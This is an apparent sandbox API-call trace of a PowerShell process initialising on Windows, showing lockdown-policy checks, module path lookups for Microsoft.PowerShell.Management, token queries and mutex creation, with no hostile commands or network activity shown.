	[0058.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.917] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd9010
	[0058.917] GetSystemDirectoryW (in: lpBuffer=0x1505fbd9010, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0058.917] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.917] WldpGetLockdownPolicy () returned 0x0
	[0058.917] GetSystemInfo (in: lpSystemInfo=0x184c18d4a0 | out: lpSystemInfo=0x184c18d4a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0058.918] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d3a8 | out: phkResult=0x184c18d3a8*=0x938) returned 0x0
	[0058.918] RegQueryValueExW (in: hKey=0x938, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d3f8, lpData=0x0, lpcbData=0x184c18d3f0*=0x0 | out: lpType=0x184c18d3f8*=0x0, lpData=0x0, lpcbData=0x184c18d3f0*=0x0) returned 0x2
	[0058.918] RegCloseKey (hKey=0x938) returned 0x0
	[0058.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.921] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd630
	[0058.921] GetSystemDirectoryW (in: lpBuffer=0x1505fbdd630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0058.921] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.921] WldpGetLockdownPolicy () returned 0x0
	[0058.921] GetSystemInfo (in: lpSystemInfo=0x184c18d300 | out: lpSystemInfo=0x184c18d300*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0058.921] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d208 | out: phkResult=0x184c18d208*=0x93c) returned 0x0
	[0058.921] RegQueryValueExW (in: hKey=0x93c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d258, lpData=0x0, lpcbData=0x184c18d250*=0x0 | out: lpType=0x184c18d258*=0x0, lpData=0x0, lpcbData=0x184c18d250*=0x0) returned 0x2
	[0058.921] RegCloseKey (hKey=0x93c) returned 0x0
	[0058.921] CloseHandle (hObject=0x938) returned 1
	[0058.922] CoCreateGuid (in: pguid=0x184c18d3b8 | out: pguid=0x184c18d3b8*(Data1=0xb2d09b68, Data2=0x7f03, Data3=0x422e, Data4=([0]=0xb5, [1]=0xa3, [2]=0x1d, [3]=0xc2, [4]=0x2a, [5]=0x83, [6]=0xce, [7]=0xce))) returned 0x0
	[0058.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.971] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en-US\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en-us\\microsoft.powershell.management.psd1")) returned 0xffffffff
	[0058.971] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en\\microsoft.powershell.management.psd1")) returned 0xffffffff
	[0058.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x184c18bf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52
	[0058.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x184c18bf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x66
	[0058.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c3c0) returned 1
	[0058.973] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x184c18c4a0 | out: lpFileInformation=0x184c18c4a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c380) returned 1
	[0058.974] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff
	[0058.974] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff
	[0058.974] CoTaskMemAlloc (cb=0x218) returned 0x1505fbda110
	[0058.974] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbda110, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.974] CoTaskMemFree (pv=0x1505fbda110) 
	[0058.974] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0058.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c180) returned 1
	[0058.974] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c260 | out: lpFileInformation=0x184c18c260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c140) returned 1
	[0058.975] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0058.978] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c180) returned 1
	[0058.978] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c260 | out: lpFileInformation=0x184c18c260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c140) returned 1
	[0058.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0058.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c180) returned 1
	[0058.979] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c260 | out: lpFileInformation=0x184c18c260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0058.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c140) returned 1
	[0058.979] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0x184c18bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53
	[0058.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bfe0) returned 1
	[0058.979] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x184c18c0c0 | out: lpFileInformation=0x184c18c0c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bfa0) returned 1
	[0058.980] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff
	[0058.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0x184c18bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x5b
	[0058.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bfe0) returned 1
	[0058.980] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x184c18c0c0 | out: lpFileInformation=0x184c18c0c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bfa0) returned 1
	[0058.981] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd630
	[0058.981] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdd630 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.981] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.981] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.982] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9010
	[0058.982] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd9010, nSize=0x10a | out: lpBuffer="C:\\Windows\\system32") returned 0x0
	[0058.982] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.982] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd6150
	[0058.982] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd6150 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.982] CoTaskMemFree (pv=0x1505fbd6150) 
	[0058.982] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.982] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.982] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d318 | out: TokenHandle=0x184c18d318*=0x938) returned 1
	[0058.982] GetTokenInformation (in: TokenHandle=0x938, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d418 | out: TokenInformation=0x0, ReturnLength=0x184c18d418) returned 0
	[0058.982] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9b5a0
	[0058.982] GetTokenInformation (in: TokenHandle=0x938, TokenInformationClass=0x1, TokenInformation=0x1505fc9b5a0, TokenInformationLength=0x2c, ReturnLength=0x184c18d418 | out: TokenInformation=0x1505fc9b5a0, ReturnLength=0x184c18d418) returned 1
	[0058.982] LocalFree (hMem=0x1505fc9b5a0) returned 0x0
	[0058.982] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1504771e478, cbSid=0x184c18d410 | out: pSid=0x1504771e478*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d410) returned 1
	[0058.983] CreateMutexW (lpMutexAttributes=0x1504771e5c8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x93c
	[0058.983] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d2b0*=0x93c, lpdwindex=0x184c18d084 | out: lpdwindex=0x184c18d084) returned 0x0
	[0058.983] CoTaskMemAlloc (cb=0x218) returned 0x1505fbda990
	[0058.983] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbda990, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x0
	[0058.983] CoTaskMemFree (pv=0x1505fbda990) 
	[0058.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d400) returned 1
	[0058.983] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1504771ec78 | out: lpFileInformation=0x1504771ec78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1
	[0058.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3c0) returned 1
	[0058.983] ReleaseMutex (hMutex=0x93c) returned 1
	[0058.983] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.983] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d448 | out: TokenHandle=0x184c18d448*=0x940) returned 1
	[0058.983] GetTokenInformation (in: TokenHandle=0x940, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d548 | out: TokenInformation=0x0, ReturnLength=0x184c18d548) returned 0
	[0058.984] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9ad60
	[0058.984] GetTokenInformation (in: TokenHandle=0x940, TokenInformationClass=0x1, TokenInformation=0x1505fc9ad60, TokenInformationLength=0x2c, ReturnLength=0x184c18d548 | out: TokenInformation=0x1505fc9ad60, ReturnLength=0x184c18d548) returned 1
	[0058.984] LocalFree (hMem=0x1505fc9ad60) returned 0x0
	[0058.984] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1504771f910, cbSid=0x184c18d540 | out: pSid=0x1504771f910*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d540) returned 1
	[0058.984] CreateMutexW (lpMutexAttributes=0x1504771fa60, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x944
	[0058.984] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d3e0*=0x944, lpdwindex=0x184c18d1b4 | out: lpdwindex=0x184c18d1b4) returned 0x0
	[0058.984] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd6150
	[0058.984] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbd6150, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.984] CoTaskMemFree (pv=0x1505fbd6150) 
	[0058.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0058.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d470) returned 1
	[0058.985] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1504773cd28 | out: lpFileInformation=0x1504773cd28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1
	[0058.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d430) returned 1
	[0058.985] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2f0) returned 1
